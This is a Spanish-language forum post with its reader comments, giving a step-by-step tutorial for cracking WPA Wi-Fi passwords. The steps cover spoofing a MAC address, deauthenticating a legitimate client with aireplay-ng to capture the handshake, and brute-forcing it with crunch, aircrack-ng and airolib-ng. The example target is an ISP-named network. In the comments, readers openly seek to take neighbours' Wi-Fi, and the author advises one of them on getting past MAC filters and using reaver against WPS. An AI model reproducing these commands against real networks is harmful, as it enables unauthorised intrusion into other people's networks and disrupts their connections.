El post que buscas se encuentra eliminado, pero este también te puede interesar

WPA airolib + crunch aircrack

Que weba, que weba, pero dado a que no estoy haciendo mi servicio social de la universidad pues le dedicare tiempo a hacer mi primer post..

Muchos saben sacar claves wep, osea, quien no? Esas viejas claves en Wired Equivalent Privacy, que ya hasta les sacaron uns distribucion DSL llamada beini para los webones, Hazme el reverendo favor.
Otros tantos pocos han investigado y saben sacar o saben los principios basicos del como hacerse de una clave en WPA, no mather, la idea de este post es la de sacarlos de la caja donde viven y piensen afuera de esta y avancen utilizando mas la imaginacion.

Algunos saben usar airolib? ya saben las tablas tipo Rainbow tables para probar muchisimas mas claves por segundo de lo que te permite aircrack con un simple diccioonario, que si tienen un procesador dual core y 2 GB lo maximo que obtienen son 1200 K/seg. Bueno, sin tanto choro, vamos al grano....


REQUISITOS

librerias aircrack-ng
binarios de crunch password generator
un handshake de una clave WPA
y chingos de paciencia



PASOS


airmon-ng stop wlan0 (detener tu targeta inalambrica, la interfaz puede cambiar "wlan0)

ifconfig wlan0 down (dar de baja la targeta para reconfigurarla)

macchanger --mac 00:11:22:33:44:55 (cambiar el Media Access Controll por uno mas facil y te agilise los sig. pasos)

iwconfig wlan0 mode monitor (cambiar el modo de la targeta a monitor)


airodump-ng wlan0 (monitorear las señales WI-FI a tu alcanze)
_________________________________________________________________________________________
EJEMPLO

CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:76F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX

BSSID STATION PWR Rate Lost Packets Probes
08:76F:60:3C:E8 00:12:34:56:78:90
____________________________________________________________________________________________

aireplay-ng -9 wlan0 *OPCIONAL* (hacer examen de inyeccion para ver si estas al alcanze y poras desautentificar al cliente)
______________________________________________________________________________________

airodump-ng -c 11 -w dump --bssid 08:76F:60:3C:E8 wlan0 (estar a la escucha de la red por si cae un handshake)



## AHORA HAY QUE DESAUTENTIFICAR UN CLIENTE (USUARIO LEGITIMO Y CONECTADO DE LA RED) PARA OBTENER UN HANDSHAKE, O APRETON DE MANOS DONDE ESTA LA CLAVE QUE DESPUES SE SACA POR METODO DE FUERZA BRUTA.

aireplay-ng -0 10 -c 00:12:34:56:78:90 -b 08:76F:60:3C:E8 -e TELMEX wlan0



DESPUES DE ESO LES APARACERA UNA RESPUESTA COMO ESTA EN LA VENTANA DE MONITOREO


CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34 [HANDSHAKE:00:12:34:56:78:90] <--------------OJO, CAPTURARON EL 4-WAY HANDSHAKE!

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:76F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX

BSSID STATION PWR Rate Lost Packets Probes
08:76F:60:3C:E8 00:12:34:56:78:90
_____________________________________________________________________



ya tenemos el handshake con el nombre de dump-01.cap y ahora para romperla tienen dos opciones, usar crunch para que genere contraseñas y hacer pipe directo a aircrack o crear unas tablas con airolib que son un poco mas rapidas, sin embargo necesitaran un buen de espacio libre, minimo unos 100 GB, les recomiendo comprarse un disco duro de 1 TB.


empezamos con crunch + aircrack



si usan backtrack 5 usen estos pasos, si no solo cambien la ruta donde se encuentran sus binarios de crunch



cd /pentest/passwords/crunch

./crunch 10 12 01234567890 | aircrack-ng /root/dump-01.cap -e TELMEX -w -


#ahora crunch empezara a generar contraseñas con los digitos que pusimos en este caso 0123456789 de diez a doce digitos de largo, pueden agregar letras pero las posibilidades aumentan exponencialmente, y es tardado, y toma un par de dias probar todas esas posibilidades. DIJE QUE NECESITARIAN PASCIENCIA



## ahora con la suite airolib, aqui necesitaran minimo 100 GB de espacio en su disco, por que la tabla ocupa un gran espacio. en el anterior no necesitan tener nada de espacio en su disco.


touch essid.txt (crear archivo de texto llamado essid.txt)

echo TELMEX > essid.txt (escribir en el archivo de texto creado el nombre de la red)

cat essid.txt (leer el archivo de texto para confirmar que se escribio)

airolib-ng wpa --import essid essid.txt (crear la tabla con el nombre wpa e importar el nombre de la red del archivo de texto que creamos)

#ahora muevanse al directorio donde tienen crunch para correrlo

./crunch 10 10 0123456789 | airolib-ng /root/wpa --import passwd -

#este ultimo paso es para importar las contraseñas que generara crunch las cuales seran en total 100 GIGAS, esto toma algo de tiempo, pero si toman atencion al numero que corre abajo se daran cuenta que crea una gran cantidad de contraseñas probables y muchisimo mas rapido, tengan pasciencia y esperen.


airolib-ng /root/wpa --stats

airolib-ng /root/wpa --clean all

airolib-ng /root/wpa --batch

airolib-ng /root/wpa -verify all

## ME DIO WEBA EXPLICAR LOS DEMAS PASOS, SOLO HAGANLOS, NO LE HAGAN AL PANCHO, DESPUES DE ESO ESTARA LISTO LA TABLA CON EL NOMBRE DE wpa Y PUEDEN PROCEDER A ROMPER LA CLAVE.


aircrack-ng -r /root/wpa dump-01.cap -e TELMEX



MUCHA SUERTE, SI TE GUSTO DEJA TU COMENTARIO SI NO YA SABES QUE TAMBIEN, DALE A FAVORITOS, ROLALO EN TU MYSPACE, FACEBOOK, TWITTER, GOOGLE+

"hector leal"

jajajaja


si necesitan ayuda con cualquier cosa avisenme, estoy en tamaulipas y san luis potosi

STARK

[email protected]

833 252 4094

31 comentarios - WPA airolib + crunch aircrack

djuva +4
no entendi nada de lo que escribiste......
pero se ve que te esforzaste.....
+10
y ya no veas a ese mono cagon de hector leal.....apendeja bastante a las masas.....
salu2
STARKCDG
@Djkmacho jajaja no mames, no hay version actualizada para claves wpa, todas las versiones te sirven con diccionario, puedes tronar mas facil el WPA con WPS activado usando reaver, si te vas por el diccionario es muy dificil y aparte te va a variar las Ks/Seg dependiendo el clock y variacion de tu procesador y la ram que tengas.

#noob
STARKCDG -1
@Djkmacho Dude, no hay DESCARGA! donde ves un link? si nunca has usado linux no vengas preguntando niveles medios, empieza desde abajo noob, no hay descarga, cualquier distribucion linux te sirve, con las herramientas necesarias. quieres robar wifi del vecino y te quejas del gasto del cyber, grow up kid!
casasco_ +1
algo de esto lo vi en otra pagina, pero en las otras vi que despues de desactivar la tarjeta y cambiar la mac tienes que ponela en modo on, y en tu post no lo vi, osea, como es? tengo que ponerla en modo on, o no?
casasco_
STARKCDG dijo:no necesariamente, por que si la pones on te abre otra interface de esa misma targeta con el nombre de mon0 y esa tiene la Mac adress original y cambia a ser la unica que puede inyectar, entonces la wlan0 queda solo como de captura, y el metodo que te doy omitiendo ese paso te deja como unica con todas las facultades la wlan0, creeme, se de lo que hablo. si tienes mas dudas avisame, el fin de semana hago mas tutoriales, por ahi tengo un video en youtube.com/irvingmvalencia

perfecto, muchas gracias por responder tenia esa duda, ahora voy a tratar de esta forma a ver que pasa
cosmorion
sabes si hay alguna manera de vincular el crunch con el iBeini? o hacer funcionar el Crunch en el iBeini?
Gracias
cynthia91 +1
Hola disculpa que te moleste. Yo utilizo beini y le habia colocado diccionarios, pero obviamente nunca pude sacar ninguna wpa... No sabia que estaba la opcion del crunch, asi que te hago una pregunta, el crunch lo pongo en funcionamiento cuando me da el handshake no? en vez de utilizar diccionario busco la ruta de este?
levymarcoslevy +1
@cynthia91 asi es, primero tenes que tener el handshake guardado en lo que seria el archivo captura-01.cap de todos modos lleva muchisimo tiempo sacar las contraseñas Saludos!
C3S4R631
podrias hacer men el video tutorial de como usar crunch con beini? porfa , esque busco info por inter y no encuentro casi
mami80
oye nen hago todo bien jajajajaj pero me sale invalid attack mode (1,2) or (wep,wpa) por que y que hago ----gracias !!!!!!!!
mami80 +1
si no tengo 100 gigas libres no funciona nen !!!! respondeme porfa te doy 10 puntajos nen !!!!!! gracias por el tuto nen !!!!!!
STARKCDG
mandame una captura de tu pantalla brother
axelmen
amigo como seria la linea de comando con letras ya que solo haz con numeros seria: 10 12 abcdefghij y como sale esta barrita | antes de poner aircrack-ng. he visto que en los router te que la clave tiene que estar entre 8 y 13 caracteres puedo variar esto tambien? cuantos caracteres como minimo y maximo tiene una clave wpa wpa2. saludos
panikoworl
saludos me podrías pasar mas info de como usar el cruch en beini.. o como usar crunch en live bt 4 o 5...por favor gracias....
_muerto
se podria usar la misma tabla de claves en otra red diferente
levymarcoslevy +1
no entiendo nada, tengo una distro de beini en una particion de 100GB como hago para bajar la consola y llamar al crunch?
janii_25
me podrías decir como usar crunch en beini xfa...
esquisino2 +1
casasco_ dijo:algo de esto lo vi en otra pagina, pero en las otras vi que despues de desactivar la tarjeta y cambiar la mac tienes que ponela en modo on, y en tu post no lo vi, osea, como es? tengo que ponerla en modo on, o no?

si genio. . es lo basico. .Se llama modo monitor para captar los paquetes..
esquisino2 +1
lo que si te pregunto.. como instalar en backtrack el crunch,.. o solo se escribe el codigo ?..
STARKCDG
crunch en backtrack 5 esta en /pentest/passwords/crunch/
panikoworl +1
saludos no hago fusionar el crunch con beini alguien podría decirme como utilizarlo,..gracias
tocomoxxo
Con ese método cuanto años tardarias en abrir una WPA de 20 digitos con un ordenata de doble nucleo...
astrolima
una consulta tengo xp me baje el crush me saltaron varias carpetas como hago esos comandos donde los escribo en la ventana de cmd la de inicio ejecutar o en la ventana del Aircrack-ng GUI.exe o este tutorial es para los que usan UBUNTU en realidad estoy pèrdido en esta parte pero no soy tan novato al respecto solo que no veo ningun instalador cuando me baje el crush pero si tengo internet porque me hackee una wep con el Comview For Wifi y el Aircrack solo que no comprendo eso de los comandos ya que me interesa hackear una WLAN CON WPA que tiene mas señal porque esta esta a las justas...
Elpibeplayq +1
hola te escribo pidiendo ayuda porque la verdad ni yo me creo lo que paso.. desencripte la clave (wpa) de una red FIbertel con crunch pero a la hora de conectarme a la red me dice que la clave es erronea!!
probe sacando de nuevo el handsake y con crunch empece a desencriptar de nuevo y me vuelve a dar la misma clave!!!! o sea que según crunch esa es la clave, pero el modem no me deja conectarme
alguna idea de porque el modem se estara poniendo la gorra?
STARKCDG
tenia un friego sin meterme a taringa. corriste con suerte que me pegara la curiosidad de logear, pues si esa es la clave ya la hiciste. hubieras probado con reaver y asi sacabas el pin el cual te daba la clave wpa. Ahora dime, no te deja asociar o no te da conexion? por que si no te da conexion checa tu direccion ip, si te dio direccion IPV4 y no te da conexion es que el modem no tiene conexion a internet, si te dio una ip toda boba al azar, entonces tiene filtros de MAC address, trata copiando
er_joni
Buenas antes de nada me parece mu buen trabajo no soy nuevo en esto pero nunca habia probao lo de las librerias por airolib-ng y me pico la curiosidad y estuve probando el comando q pusiste con crunch y airolib-ng veo como genera las pass y demas pero sobre los 2.000.000.000 de pass se me pone a correr las pass en negativo - 1.900.000.000 hasta 0 y despues vuelve a subir y despues otra vez a bajar y no se si la libreria acabaria bien hecha o no lo digo sino es posible y da fallos meter diccionario por secciones tipo desde 00.... asta 11.... y asi asta 99... espero averme explicado bien y a ver si podrias resolverme esa duda
STARKCDG
orale, la verdad no te entendi a la perfeccion pero me doy una idea, si me puedes mandar un screenshot a mi correo te lo agradesco, pero la verdad este metodo ya esta bastante viejo y practicamente obsoleto, tal ves deberias probar usando hashcat con una targeta grafica que soporte CUDA, ya que es mucho mas veloz, yo probe con la de mi oficina y me daba 15,000 K/s. Pero igual mandame el screenshot de tu problema a [email protected]